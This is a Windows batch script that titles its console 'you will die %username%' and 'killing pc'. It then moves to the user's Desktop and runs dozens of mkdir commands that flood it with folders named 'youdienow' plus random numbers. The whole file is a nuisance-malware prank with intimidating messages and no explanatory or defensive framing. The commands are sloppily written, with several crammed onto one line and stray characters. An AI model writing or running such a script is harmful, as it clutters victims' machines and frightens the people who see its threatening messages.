title you will die %username%
cd \Users\%username%\Desktop
color a
cls


title killing pc
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% 
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% v
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% 
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% 
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% v
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% 
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% 
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% 
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% v
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% 
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% 
 mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% mkdir youdienow.%random%.%random%.%random%.%random%.%random% v
exit 
